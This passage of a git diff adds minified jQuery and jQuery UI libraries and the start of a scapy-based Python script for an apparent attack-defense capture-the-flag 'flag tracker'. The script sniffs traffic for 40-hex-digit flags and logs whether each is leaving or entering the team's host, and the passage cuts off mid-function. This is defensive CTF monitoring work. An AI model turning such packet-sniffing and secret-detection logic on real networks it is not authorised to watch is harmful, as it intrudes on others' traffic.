d,e=c.head||c.getElementsByTagName("head")[0]||c.documentElement;return{send:function(f,g){d=c.createElement("script"),d.async="async",a.scriptCharset&&(d.charset=a.scriptCharset),d.src=a.url,d.onload=d.onreadystatechange=function(a,c){if(c||!d.readyState||/loaded|complete/.test(d.readyState))d.onload=d.onreadystatechange=null,e&&d.parentNode&&e.removeChild(d),d=b,c||g(200,"success")},e.insertBefore(d,e.firstChild)},abort:function(){d&&d.onload(0,1)}}}});var cb=a.ActiveXObject?function(){for(var a in cd)cd[a](0,1)}:!1,cc=0,cd;f.ajaxSettings.xhr=a.ActiveXObject?function(){return!this.isLocal&&ce()||cf()}:ce,function(a){f.extend(f.support,{ajax:!!a,cors:!!a&&"withCredentials"in a})}(f.ajaxSettings.xhr()),f.support.ajax&&f.ajaxTransport(function(c){if(!c.crossDomain||f.support.cors){var d;return{send:function(e,g){var h=c.xhr(),i,j;c.username?h.open(c.type,c.url,c.async,c.username,c.password):h.open(c.type,c.url,c.async);if(c.xhrFields)for(j in c.xhrFields)h[j]=c.xhrFields[j];c.mimeType&&h.overrideMimeType&&h.overrideMimeType(c.mimeType),!c.crossDomain&&!e["X-Requested-With"]&&(e["X-Requested-With"]="XMLHttpRequest");try{for(j in e)h.setRequestHeader(j,e[j])}catch(k){}h.send(c.hasContent&&c.data||null),d=function(a,e){var j,k,l,m,n;try{if(d&&(e||h.readyState===4)){d=b,i&&(h.onreadystatechange=f.noop,cb&&delete cd[i]);if(e)h.readyState!==4&&h.abort();else{j=h.status,l=h.getAllResponseHeaders(),m={},n=h.responseXML,n&&n.documentElement&&(m.xml=n),m.text=h.responseText;try{k=h.statusText}catch(o){k=""}!j&&c.isLocal&&!c.crossDomain?j=m.text?200:404:j===1223&&(j=204)}}}catch(p){e||g(-1,p)}m&&g(j,k,m,l)},!c.async||h.readyState===4?d():(i=++cc,cb&&(cd||(cd={},f(a).unload(cb)),cd[i]=d),h.onreadystatechange=d)},abort:function(){d&&d(0,1)}}}});var cg={},ch,ci,cj=/^(?:toggle|show|hide)$/,ck=/^([+\-]=)?([\d+.\-]+)([a-z%]*)$/i,cl,cm=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]],cn,co=a.webkitRequestAnimationFrame||a.mozRequestAnimationFrame||a.oRequestAnimationFrame;f.fn.extend({show:function(a,b,c){var d,e;if(a||a===0)return this.animate(cr("show",3),a,b,c);for(var g=0,h=this.length;g<h;g++)d=this[g],d.style&&(e=d.style.display,!f._data(d,"olddisplay")&&e==="none"&&(e=d.style.display=""),e===""&&f.css(d,"display")==="none"&&f._data(d,"olddisplay",cs(d.nodeName)));for(g=0;g<h;g++){d=this[g];if(d.style){e=d.style.display;if(e===""||e==="none")d.style.display=f._data(d,"olddisplay")||""}}return this},hide:function(a,b,c){if(a||a===0)return this.animate(cr("hide",3),a,b,c);for(var d=0,e=this.length;d<e;d++)if(this[d].style){var g=f.css(this[d],"display");g!=="none"&&!f._data(this[d],"olddisplay")&&f._data(this[d],"olddisplay",g)}for(d=0;d<e;d++)this[d].style&&(this[d].style.display="none");return this},_toggle:f.fn.toggle,toggle:function(a,b,c){var d=typeof a=="boolean";f.isFunction(a)&&f.isFunction(b)?this._toggle.apply(this,arguments):a==null||d?this.each(function(){var b=d?a:f(this).is(":hidden");f(this)[b?"show":"hide"]()}):this.animate(cr("toggle",3),a,b,c);return this},fadeTo:function(a,b,c,d){return this.filter(":hidden").css("opacity",0).show().end().animate({opacity:b},a,c,d)},animate:function(a,b,c,d){var e=f.speed(b,c,d);if(f.isEmptyObject(a))return this.each(e.complete,[!1]);a=f.extend({},a);return this[e.queue===!1?"each":"queue"](function(){e.queue===!1&&f._mark(this);var b=f.extend({},e),c=this.nodeType===1,d=c&&f(this).is(":hidden"),g,h,i,j,k,l,m,n,o;b.animatedProperties={};for(i in a){g=f.camelCase(i),i!==g&&(a[g]=a[i],delete a[i]),h=a[g],f.isArray(h)?(b.animatedProperties[g]=h[1],h=a[g]=h[0]):b.animatedProperties[g]=b.specialEasing&&b.specialEasing[g]||b.easing||"swing";if(h==="hide"&&d||h==="show"&&!d)return b.complete.call(this);c&&(g==="height"||g==="width")&&(b.overflow=[this.style.overflow,this.style.overflowX,this.style.overflowY],f.css(this,"display")==="inline"&&f.css(this,"float")==="none"&&(f.support.inlineBlockNeedsLayout?(j=cs(this.nodeName),j==="inline"?this.style.display="inline-block":(this.style.display="inline",this.style.zoom=1)):this.style.display="inline-block"))}b.overflow!=null&&(this.style.overflow="hidden");for(i in a)k=new f.fx(this,b,i),h=a[i],cj.test(h)?k[h==="toggle"?d?"show":"hide":h]():(l=ck.exec(h),m=k.cur(),l?(n=parseFloat(l[2]),o=l[3]||(f.cssNumber[i]?"":"px"),o!=="px"&&(f.style(this,i,(n||1)+o),m=(n||1)/k.cur()*m,f.style(this,i,m+o)),l[1]&&(n=(l[1]==="-="?-1:1)*n+m),k.custom(m,n,o)):k.custom(m,h,""));return!0})},stop:function(a,b){a&&this.queue([]),this.each(function(){var a=f.timers,c=a.length;b||f._unmark(!0,this);while(c--)a[c].elem===this&&(b&&a[c](!0),a.splice(c,1))}),b||this.dequeue();return this}}),f.each({slideDown:cr("show",1),slideUp:cr("hide",1),slideToggle:cr("toggle",1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(a,b){f.fn[a]=function(a,c,d){return this.animate(b,a,c,d)}}),f.extend({speed:function(a,b,c){var d=a&&typeof a=="object"?f.extend({},a):{complete:c||!c&&b||f.isFunction(a)&&a,duration:a,easing:c&&b||b&&!f.isFunction(b)&&b};d.duration=f.fx.off?0:typeof d.duration=="number"?d.duration:d.duration in f.fx.speeds?f.fx.speeds[d.duration]:f.fx.speeds._default,d.old=d.complete,d.complete=function(a){f.isFunction(d.old)&&d.old.call(this),d.queue!==!1?f.dequeue(this):a!==!1&&f._unmark(this)};return d},easing:{linear:function(a,b,c,d){return c+d*a},swing:function(a,b,c,d){return(-Math.cos(a*Math.PI)/2+.5)*d+c}},timers:[],fx:function(a,b,c){this.options=b,this.elem=a,this.prop=c,b.orig=b.orig||{}}}),f.fx.prototype={update:function(){this.options.step&&this.options.step.call(this.elem,this.now,this),(f.fx.step[this.prop]||f.fx.step._default)(this)},cur:function(){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==null))return this.elem[this.prop];var a,b=f.css(this.elem,this.prop);return isNaN(a=parseFloat(b))?!b||b==="auto"?0:b:a},custom:function(a,b,c){function h(a){return d.step(a)}var d=this,e=f.fx,g;this.startTime=cn||cp(),this.start=a,this.end=b,this.unit=c||this.unit||(f.cssNumber[this.prop]?"":"px"),this.now=this.start,this.pos=this.state=0,h.elem=this.elem,h()&&f.timers.push(h)&&!cl&&(co?(cl=!0,g=function(){cl&&(co(g),e.tick())},co(g)):cl=setInterval(e.tick,e.interval))},show:function(){this.options.orig[this.prop]=f.style(this.elem,this.prop),this.options.show=!0,this.custom(this.prop==="width"||this.prop==="height"?1:0,this.cur()),f(this.elem).show()},hide:function(){this.options.orig[this.prop]=f.style(this.elem,this.prop),this.options.hide=!0,this.custom(this.cur(),0)},step:function(a){var b=cn||cp(),c=!0,d=this.elem,e=this.options,g,h;if(a||b>=e.duration+this.startTime){this.now=this.end,this.pos=this.state=1,this.update(),e.animatedProperties[this.prop]=!0;for(g in e.animatedProperties)e.animatedProperties[g]!==!0&&(c=!1);if(c){e.overflow!=null&&!f.support.shrinkWrapBlocks&&f.each(["","X","Y"],function(a,b){d.style["overflow"+b]=e.overflow[a]}),e.hide&&f(d).hide();if(e.hide||e.show)for(var i in e.animatedProperties)f.style(d,i,e.orig[i]);e.complete.call(d)}return!1}e.duration==Infinity?this.now=b:(h=b-this.startTime,this.state=h/e.duration,this.pos=f.easing[e.animatedProperties[this.prop]](this.state,h,0,1,e.duration),this.now=this.start+(this.end-this.start)*this.pos),this.update();return!0}},f.extend(f.fx,{tick:function(){for(var a=f.timers,b=0;b<a.length;++b)a[b]()||a.splice(b--,1);a.length||f.fx.stop()},interval:13,stop:function(){clearInterval(cl),cl=null},speeds:{slow:600,fast:200,_default:400},step:{opacity:function(a){f.style(a.elem,"opacity",a.now)},_default:function(a){a.elem.style&&a.elem.style[a.prop]!=null?a.elem.style[a.prop]=(a.prop==="width"||a.prop==="height"?Math.max(0,a.now):a.now)+a.unit:a.elem[a.prop]=a.now}}}),f.expr&&f.expr.filters&&(f.expr.filters.animated=function(a){return f.grep(f.timers,function(b){return a===b.elem}).length});var ct=/^t(?:able|d|h)$/i,cu=/^(?:body|html)$/i;"getBoundingClientRect"in c.documentElement?f.fn.offset=function(a){var b=this[0],c;if(a)return this.each(function(b){f.offset.setOffset(this,a,b)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return f.offset.bodyOffset(b);try{c=b.getBoundingClientRect()}catch(d){}var e=b.ownerDocument,g=e.documentElement;if(!c||!f.contains(g,b))return c?{top:c.top,left:c.left}:{top:0,left:0};var h=e.body,i=cv(e),j=g.clientTop||h.clientTop||0,k=g.clientLeft||h.clientLeft||0,l=i.pageYOffset||f.support.boxModel&&g.scrollTop||h.scrollTop,m=i.pageXOffset||f.support.boxModel&&g.scrollLeft||h.scrollLeft,n=c.top+l-j,o=c.left+m-k;return{top:n,left:o}}:f.fn.offset=function(a){var b=this[0];if(a)return this.each(function(b){f.offset.setOffset(this,a,b)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return f.offset.bodyOffset(b);f.offset.initialize();var c,d=b.offsetParent,e=b,g=b.ownerDocument,h=g.documentElement,i=g.body,j=g.defaultView,k=j?j.getComputedStyle(b,null):b.currentStyle,l=b.offsetTop,m=b.offsetLeft;while((b=b.parentNode)&&b!==i&&b!==h){if(f.offset.supportsFixedPosition&&k.position==="fixed")break;c=j?j.getComputedStyle(b,null):b.currentStyle,l-=b.scrollTop,m-=b.scrollLeft,b===d&&(l+=b.offsetTop,m+=b.offsetLeft,f.offset.doesNotAddBorder&&(!f.offset.doesAddBorderForTableAndCells||!ct.test(b.nodeName))&&(l+=parseFloat(c.borderTopWidth)||0,m+=parseFloat(c.borderLeftWidth)||0),e=d,d=b.offsetParent),f.offset.subtractsBorderForOverflowNotVisible&&c.overflow!=="visible"&&(l+=parseFloat(c.borderTopWidth)||0,m+=parseFloat(c.borderLeftWidth)||0),k=c}if(k.position==="relative"||k.position==="static")l+=i.offsetTop,m+=i.offsetLeft;f.offset.supportsFixedPosition&&k.position==="fixed"&&(l+=Math.max(h.scrollTop,i.scrollTop),m+=Math.max(h.scrollLeft,i.scrollLeft));return{top:l,left:m}},f.offset={initialize:function(){var a=c.body,b=c.createElement("div"),d,e,g,h,i=parseFloat(f.css(a,"marginTop"))||0,j="<div style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;'><div></div></div><table style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;' cellpadding='0' cellspacing='0'><tr><td></td></tr></table>";f.extend(b.style,{position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"}),b.innerHTML=j,a.insertBefore(b,a.firstChild),d=b.firstChild,e=d.firstChild,h=d.nextSibling.firstChild.firstChild,this.doesNotAddBorder=e.offsetTop!==5,this.doesAddBorderForTableAndCells=h.offsetTop===5,e.style.position="fixed",e.style.top="20px",this.supportsFixedPosition=e.offsetTop===20||e.offsetTop===15,e.style.position=e.style.top="",d.style.overflow="hidden",d.style.position="relative",this.subtractsBorderForOverflowNotVisible=e.offsetTop===-5,this.doesNotIncludeMarginInBodyOffset=a.offsetTop!==i,a.removeChild(b),f.offset.initialize=f.noop},bodyOffset:function(a){var b=a.offsetTop,c=a.offsetLeft;f.offset.initialize(),f.offset.doesNotIncludeMarginInBodyOffset&&(b+=parseFloat(f.css(a,"marginTop"))||0,c+=parseFloat(f.css(a,"marginLeft"))||0);return{top:b,left:c}},setOffset:function(a,b,c){var d=f.css(a,"position");d==="static"&&(a.style.position="relative");var e=f(a),g=e.offset(),h=f.css(a,"top"),i=f.css(a,"left"),j=(d==="absolute"||d==="fixed")&&f.inArray("auto",[h,i])>-1,k={},l={},m,n;j?(l=e.position(),m=l.top,n=l.left):(m=parseFloat(h)||0,n=parseFloat(i)||0),f.isFunction(b)&&(b=b.call(a,c,g)),b.top!=null&&(k.top=b.top-g.top+m),b.left!=null&&(k.left=b.left-g.left+n),"using"in b?b.using.call(a,k):e.css(k)}},f.fn.extend({position:function(){if(!this[0])return null;var a=this[0],b=this.offsetParent(),c=this.offset(),d=cu.test(b[0].nodeName)?{top:0,left:0}:b.offset();c.top-=parseFloat(f.css(a,"marginTop"))||0,c.left-=parseFloat(f.css(a,"marginLeft"))||0,d.top+=parseFloat(f.css(b[0],"borderTopWidth"))||0,d.left+=parseFloat(f.css(b[0],"borderLeftWidth"))||0;return{top:c.top-d.top,left:c.left-d.left}},offsetParent:function(){return this.map(function(){var a=this.offsetParent||c.body;while(a&&!cu.test(a.nodeName)&&f.css(a,"position")==="static")a=a.offsetParent;return a})}}),f.each(["Left","Top"],function(a,c){var d="scroll"+c;f.fn[d]=function(c){var e,g;if(c===b){e=this[0];if(!e)return null;g=cv(e);return g?"pageXOffset"in g?g[a?"pageYOffset":"pageXOffset"]:f.support.boxModel&&g.document.documentElement[d]||g.document.body[d]:e[d]}return this.each(function(){g=cv(this),g?g.scrollTo(a?f(g).scrollLeft():c,a?c:f(g).scrollTop()):this[d]=c})}}),f.each(["Height","Width"],function(a,c){var d=c.toLowerCase();f.fn["inner"+c]=function(){var a=this[0];return a&&a.style?parseFloat(f.css(a,d,"padding")):null},f.fn["outer"+c]=function(a){var b=this[0];return b&&b.style?parseFloat(f.css(b,d,a?"margin":"border")):null},f.fn[d]=function(a){var e=this[0];if(!e)return a==null?null:this;if(f.isFunction(a))return this.each(function(b){var c=f(this);c[d](a.call(this,b,c[d]()))});if(f.isWindow(e)){var g=e.document.documentElement["client"+c];return e.document.compatMode==="CSS1Compat"&&g||e.document.body["client"+c]||g}if(e.nodeType===9)return Math.max(e.documentElement["client"+c],e.body["scroll"+c],e.documentElement["scroll"+c],e.body["offset"+c],e.documentElement["offset"+c]);if(a===b){var h=f.css(e,d),i=parseFloat(h);return f.isNaN(i)?h:i}return this.css(d,typeof a=="string"?a:a+"px")}}),a.jQuery=a.$=f})(window); +\ No newline at end of file diff --git a/flag-tracker/jquery-ui-1.8.16.custom.min.js b/flag-tracker/jquery-ui-1.8.16.custom.min.js @@ -0,0 +1,46 @@ +/* + * jQuery UI Effects 1.8.16 + * + * Copyright 2011, AUTHORS.txt (http://jqueryui.com/about) + * Dual licensed under the MIT or GPL Version 2 licenses. + * http://jquery.org/license + * + * http://docs.jquery.com/UI/Effects/ + */ +jQuery.effects||function(f,j){function m(c){var a;if(c&&c.constructor==Array&&c.length==3)return c;if(a=/rgb\(\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*\)/.exec(c))return[parseInt(a[1],10),parseInt(a[2],10),parseInt(a[3],10)];if(a=/rgb\(\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*\)/.exec(c))return[parseFloat(a[1])*2.55,parseFloat(a[2])*2.55,parseFloat(a[3])*2.55];if(a=/#([a-fA-F0-9]{2})([a-fA-F0-9]{2})([a-fA-F0-9]{2})/.exec(c))return[parseInt(a[1], +16),parseInt(a[2],16),parseInt(a[3],16)];if(a=/#([a-fA-F0-9])([a-fA-F0-9])([a-fA-F0-9])/.exec(c))return[parseInt(a[1]+a[1],16),parseInt(a[2]+a[2],16),parseInt(a[3]+a[3],16)];if(/rgba\(0, 0, 0, 0\)/.exec(c))return n.transparent;return n[f.trim(c).toLowerCase()]}function s(c,a){var b;do{b=f.curCSS(c,a);if(b!=""&&b!="transparent"||f.nodeName(c,"body"))break;a="backgroundColor"}while(c=c.parentNode);return m(b)}function o(){var c=document.defaultView?document.defaultView.getComputedStyle(this,null):this.currentStyle, +a={},b,d;if(c&&c.length&&c[0]&&c[c[0]])for(var e=c.length;e--;){b=c[e];if(typeof c[b]=="string"){d=b.replace(/\-(\w)/g,function(g,h){return h.toUpperCase()});a[d]=c[b]}}else for(b in c)if(typeof c[b]==="string")a[b]=c[b];return a}function p(c){var a,b;for(a in c){b=c[a];if(b==null||f.isFunction(b)||a in t||/scrollbar/.test(a)||!/color/i.test(a)&&isNaN(parseFloat(b)))delete c[a]}return c}function u(c,a){var b={_:0},d;for(d in a)if(c[d]!=a[d])b[d]=a[d];return b}function k(c,a,b,d){if(typeof c=="object"){d= +a;b=null;a=c;c=a.effect}if(f.isFunction(a)){d=a;b=null;a={}}if(typeof a=="number"||f.fx.speeds[a]){d=b;b=a;a={}}if(f.isFunction(b)){d=b;b=null}a=a||{};b=b||a.duration;b=f.fx.off?0:typeof b=="number"?b:b in f.fx.speeds?f.fx.speeds[b]:f.fx.speeds._default;d=d||a.complete;return[c,a,b,d]}function l(c){if(!c||typeof c==="number"||f.fx.speeds[c])return true;if(typeof c==="string"&&!f.effects[c])return true;return false}f.effects={};f.each(["backgroundColor","borderBottomColor","borderLeftColor","borderRightColor", +"borderTopColor","borderColor","color","outlineColor"],function(c,a){f.fx.step[a]=function(b){if(!b.colorInit){b.start=s(b.elem,a);b.end=m(b.end);b.colorInit=true}b.elem.style[a]="rgb("+Math.max(Math.min(parseInt(b.pos*(b.end[0]-b.start[0])+b.start[0],10),255),0)+","+Math.max(Math.min(parseInt(b.pos*(b.end[1]-b.start[1])+b.start[1],10),255),0)+","+Math.max(Math.min(parseInt(b.pos*(b.end[2]-b.start[2])+b.start[2],10),255),0)+")"}});var n={aqua:[0,255,255],azure:[240,255,255],beige:[245,245,220],black:[0, +0,0],blue:[0,0,255],brown:[165,42,42],cyan:[0,255,255],darkblue:[0,0,139],darkcyan:[0,139,139],darkgrey:[169,169,169],darkgreen:[0,100,0],darkkhaki:[189,183,107],darkmagenta:[139,0,139],darkolivegreen:[85,107,47],darkorange:[255,140,0],darkorchid:[153,50,204],darkred:[139,0,0],darksalmon:[233,150,122],darkviolet:[148,0,211],fuchsia:[255,0,255],gold:[255,215,0],green:[0,128,0],indigo:[75,0,130],khaki:[240,230,140],lightblue:[173,216,230],lightcyan:[224,255,255],lightgreen:[144,238,144],lightgrey:[211, +211,211],lightpink:[255,182,193],lightyellow:[255,255,224],lime:[0,255,0],magenta:[255,0,255],maroon:[128,0,0],navy:[0,0,128],olive:[128,128,0],orange:[255,165,0],pink:[255,192,203],purple:[128,0,128],violet:[128,0,128],red:[255,0,0],silver:[192,192,192],white:[255,255,255],yellow:[255,255,0],transparent:[255,255,255]},q=["add","remove","toggle"],t={border:1,borderBottom:1,borderColor:1,borderLeft:1,borderRight:1,borderTop:1,borderWidth:1,margin:1,padding:1};f.effects.animateClass=function(c,a,b, +d){if(f.isFunction(b)){d=b;b=null}return this.queue(function(){var e=f(this),g=e.attr("style")||" ",h=p(o.call(this)),r,v=e.attr("class");f.each(q,function(w,i){c[i]&&e[i+"Class"](c[i])});r=p(o.call(this));e.attr("class",v);e.animate(u(h,r),{queue:false,duration:a,easing:b,complete:function(){f.each(q,function(w,i){c[i]&&e[i+"Class"](c[i])});if(typeof e.attr("style")=="object"){e.attr("style").cssText="";e.attr("style").cssText=g}else e.attr("style",g);d&&d.apply(this,arguments);f.dequeue(this)}})})}; +f.fn.extend({_addClass:f.fn.addClass,addClass:function(c,a,b,d){return a?f.effects.animateClass.apply(this,[{add:c},a,b,d]):this._addClass(c)},_removeClass:f.fn.removeClass,removeClass:function(c,a,b,d){return a?f.effects.animateClass.apply(this,[{remove:c},a,b,d]):this._removeClass(c)},_toggleClass:f.fn.toggleClass,toggleClass:function(c,a,b,d,e){return typeof a=="boolean"||a===j?b?f.effects.animateClass.apply(this,[a?{add:c}:{remove:c},b,d,e]):this._toggleClass(c,a):f.effects.animateClass.apply(this, +[{toggle:c},a,b,d])},switchClass:function(c,a,b,d,e){return f.effects.animateClass.apply(this,[{add:a,remove:c},b,d,e])}});f.extend(f.effects,{version:"1.8.16",save:function(c,a){for(var b=0;b<a.length;b++)a[b]!==null&&c.data("ec.storage."+a[b],c[0].style[a[b]])},restore:function(c,a){for(var b=0;b<a.length;b++)a[b]!==null&&c.css(a[b],c.data("ec.storage."+a[b]))},setMode:function(c,a){if(a=="toggle")a=c.is(":hidden")?"show":"hide";return a},getBaseline:function(c,a){var b;switch(c[0]){case "top":b= +0;break;case "middle":b=0.5;break;case "bottom":b=1;break;default:b=c[0]/a.height}switch(c[1]){case "left":c=0;break;case "center":c=0.5;break;case "right":c=1;break;default:c=c[1]/a.width}return{x:c,y:b}},createWrapper:function(c){if(c.parent().is(".ui-effects-wrapper"))return c.parent();var a={width:c.outerWidth(true),height:c.outerHeight(true),"float":c.css("float")},b=f("<div></div>").addClass("ui-effects-wrapper").css({fontSize:"100%",background:"transparent",border:"none",margin:0,padding:0}), +d=document.activeElement;c.wrap(b);if(c[0]===d||f.contains(c[0],d))f(d).focus();b=c.parent();if(c.css("position")=="static"){b.css({position:"relative"});c.css({position:"relative"})}else{f.extend(a,{position:c.css("position"),zIndex:c.css("z-index")});f.each(["top","left","bottom","right"],function(e,g){a[g]=c.css(g);if(isNaN(parseInt(a[g],10)))a[g]="auto"});c.css({position:"relative",top:0,left:0,right:"auto",bottom:"auto"})}return b.css(a).show()},removeWrapper:function(c){var a,b=document.activeElement; +if(c.parent().is(".ui-effects-wrapper")){a=c.parent().replaceWith(c);if(c[0]===b||f.contains(c[0],b))f(b).focus();return a}return c},setTransition:function(c,a,b,d){d=d||{};f.each(a,function(e,g){unit=c.cssUnit(g);if(unit[0]>0)d[g]=unit[0]*b+unit[1]});return d}});f.fn.extend({effect:function(c){var a=k.apply(this,arguments),b={options:a[1],duration:a[2],callback:a[3]};a=b.options.mode;var d=f.effects[c];if(f.fx.off||!d)return a?this[a](b.duration,b.callback):this.each(function(){b.callback&&b.callback.call(this)}); +return d.call(this,b)},_show:f.fn.show,show:function(c){if(l(c))return this._show.apply(this,arguments);else{var a=k.apply(this,arguments);a[1].mode="show";return this.effect.apply(this,a)}},_hide:f.fn.hide,hide:function(c){if(l(c))return this._hide.apply(this,arguments);else{var a=k.apply(this,arguments);a[1].mode="hide";return this.effect.apply(this,a)}},__toggle:f.fn.toggle,toggle:function(c){if(l(c)||typeof c==="boolean"||f.isFunction(c))return this.__toggle.apply(this,arguments);else{var a=k.apply(this, +arguments);a[1].mode="toggle";return this.effect.apply(this,a)}},cssUnit:function(c){var a=this.css(c),b=[];f.each(["em","px","%","pt"],function(d,e){if(a.indexOf(e)>0)b=[parseFloat(a),e]});return b}});f.easing.jswing=f.easing.swing;f.extend(f.easing,{def:"easeOutQuad",swing:function(c,a,b,d,e){return f.easing[f.easing.def](c,a,b,d,e)},easeInQuad:function(c,a,b,d,e){return d*(a/=e)*a+b},easeOutQuad:function(c,a,b,d,e){return-d*(a/=e)*(a-2)+b},easeInOutQuad:function(c,a,b,d,e){if((a/=e/2)<1)return d/ +2*a*a+b;return-d/2*(--a*(a-2)-1)+b},easeInCubic:function(c,a,b,d,e){return d*(a/=e)*a*a+b},easeOutCubic:function(c,a,b,d,e){return d*((a=a/e-1)*a*a+1)+b},easeInOutCubic:function(c,a,b,d,e){if((a/=e/2)<1)return d/2*a*a*a+b;return d/2*((a-=2)*a*a+2)+b},easeInQuart:function(c,a,b,d,e){return d*(a/=e)*a*a*a+b},easeOutQuart:function(c,a,b,d,e){return-d*((a=a/e-1)*a*a*a-1)+b},easeInOutQuart:function(c,a,b,d,e){if((a/=e/2)<1)return d/2*a*a*a*a+b;return-d/2*((a-=2)*a*a*a-2)+b},easeInQuint:function(c,a,b, +d,e){return d*(a/=e)*a*a*a*a+b},easeOutQuint:function(c,a,b,d,e){return d*((a=a/e-1)*a*a*a*a+1)+b},easeInOutQuint:function(c,a,b,d,e){if((a/=e/2)<1)return d/2*a*a*a*a*a+b;return d/2*((a-=2)*a*a*a*a+2)+b},easeInSine:function(c,a,b,d,e){return-d*Math.cos(a/e*(Math.PI/2))+d+b},easeOutSine:function(c,a,b,d,e){return d*Math.sin(a/e*(Math.PI/2))+b},easeInOutSine:function(c,a,b,d,e){return-d/2*(Math.cos(Math.PI*a/e)-1)+b},easeInExpo:function(c,a,b,d,e){return a==0?b:d*Math.pow(2,10*(a/e-1))+b},easeOutExpo:function(c, +a,b,d,e){return a==e?b+d:d*(-Math.pow(2,-10*a/e)+1)+b},easeInOutExpo:function(c,a,b,d,e){if(a==0)return b;if(a==e)return b+d;if((a/=e/2)<1)return d/2*Math.pow(2,10*(a-1))+b;return d/2*(-Math.pow(2,-10*--a)+2)+b},easeInCirc:function(c,a,b,d,e){return-d*(Math.sqrt(1-(a/=e)*a)-1)+b},easeOutCirc:function(c,a,b,d,e){return d*Math.sqrt(1-(a=a/e-1)*a)+b},easeInOutCirc:function(c,a,b,d,e){if((a/=e/2)<1)return-d/2*(Math.sqrt(1-a*a)-1)+b;return d/2*(Math.sqrt(1-(a-=2)*a)+1)+b},easeInElastic:function(c,a,b, +d,e){c=1.70158;var g=0,h=d;if(a==0)return b;if((a/=e)==1)return b+d;g||(g=e*0.3);if(h<Math.abs(d)){h=d;c=g/4}else c=g/(2*Math.PI)*Math.asin(d/h);return-(h*Math.pow(2,10*(a-=1))*Math.sin((a*e-c)*2*Math.PI/g))+b},easeOutElastic:function(c,a,b,d,e){c=1.70158;var g=0,h=d;if(a==0)return b;if((a/=e)==1)return b+d;g||(g=e*0.3);if(h<Math.abs(d)){h=d;c=g/4}else c=g/(2*Math.PI)*Math.asin(d/h);return h*Math.pow(2,-10*a)*Math.sin((a*e-c)*2*Math.PI/g)+d+b},easeInOutElastic:function(c,a,b,d,e){c=1.70158;var g= +0,h=d;if(a==0)return b;if((a/=e/2)==2)return b+d;g||(g=e*0.3*1.5);if(h<Math.abs(d)){h=d;c=g/4}else c=g/(2*Math.PI)*Math.asin(d/h);if(a<1)return-0.5*h*Math.pow(2,10*(a-=1))*Math.sin((a*e-c)*2*Math.PI/g)+b;return h*Math.pow(2,-10*(a-=1))*Math.sin((a*e-c)*2*Math.PI/g)*0.5+d+b},easeInBack:function(c,a,b,d,e,g){if(g==j)g=1.70158;return d*(a/=e)*a*((g+1)*a-g)+b},easeOutBack:function(c,a,b,d,e,g){if(g==j)g=1.70158;return d*((a=a/e-1)*a*((g+1)*a+g)+1)+b},easeInOutBack:function(c,a,b,d,e,g){if(g==j)g=1.70158; +if((a/=e/2)<1)return d/2*a*a*(((g*=1.525)+1)*a-g)+b;return d/2*((a-=2)*a*(((g*=1.525)+1)*a+g)+2)+b},easeInBounce:function(c,a,b,d,e){return d-f.easing.easeOutBounce(c,e-a,0,d,e)+b},easeOutBounce:function(c,a,b,d,e){return(a/=e)<1/2.75?d*7.5625*a*a+b:a<2/2.75?d*(7.5625*(a-=1.5/2.75)*a+0.75)+b:a<2.5/2.75?d*(7.5625*(a-=2.25/2.75)*a+0.9375)+b:d*(7.5625*(a-=2.625/2.75)*a+0.984375)+b},easeInOutBounce:function(c,a,b,d,e){if(a<e/2)return f.easing.easeInBounce(c,a*2,0,d,e)*0.5+b;return f.easing.easeOutBounce(c, +a*2-e,0,d,e)*0.5+d*0.5+b}})}(jQuery); +;/* + * jQuery UI Effects Highlight 1.8.16 + * + * Copyright 2011, AUTHORS.txt (http://jqueryui.com/about) + * Dual licensed under the MIT or GPL Version 2 licenses. + * http://jquery.org/license + * + * http://docs.jquery.com/UI/Effects/Highlight + * + * Depends: + * jquery.effects.core.js + */ +(function(b){b.effects.highlight=function(c){return this.queue(function(){var a=b(this),e=["backgroundImage","backgroundColor","opacity"],d=b.effects.setMode(a,c.options.mode||"show"),f={backgroundColor:a.css("backgroundColor")};if(d=="hide")f.opacity=0;b.effects.save(a,e);a.show().css({backgroundImage:"none",backgroundColor:c.options.color||"#ffff99"}).animate(f,{queue:false,duration:c.duration,easing:c.options.easing,complete:function(){d=="hide"&&a.hide();b.effects.restore(a,e);d=="show"&&!b.support.opacity&& +this.style.removeAttribute("filter");c.callback&&c.callback.apply(this,arguments);a.dequeue()}})})}})(jQuery); +; +\ No newline at end of file diff --git a/flag-tracker/pcap-analyzer.py b/flag-tracker/pcap-analyzer.py @@ -0,0 +1,196 @@ +#!/usr/bin/env python +from scapy.all import * +import sys +import re +import os +from streams import * +import json +from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler +from datetime import datetime +from threading import Thread +from SocketServer import ThreadingMixIn +import time + +flag_regex = r'[A-Fa-f0-9]{40}' +#rwthctf +#flag_regex = r'[A-Fa-f0-9]{40}' +#flag_regex = r'HTTP' + +class AnalyzedTraffic(): + def __init__(self, myself=None): + self.myself = myself + self.streams = Streams(myself=myself) + self.seen_flags = [] + + def add_package(self, pkt): + # Let the TCP stream parser do its work... + s = self.streams.parse(pkt) + # if packet contains a flag, put a reference in seen_flags + mg = None + if hasattr(pkt, 'load'): + mg = re.search(flag_regex, pkt.load) + if mg: + flag = mg.group(0) + direction = 'unknown' + if pkt.haslayer(IP): + if pkt.getlayer(IP).src == self.myself: + print 'Caught OUT : ', flag + direction = 'out' + elif pkt.getlayer(IP).dst == self.myself: + direction = 'in' + print 'Caught IN : ', flag + if direction == 'unknown': + return + + # either a reference to the packet or to the whole stream + if s: + s.contains_flag = True + self.seen_flags.append((datetime.now(), flag, direction, s)) + else: + self.seen_flags.append((datetime.now(), flag, direction, pkt)) + + def get_latest_flags(self,foo=None): + r = [] + for e in 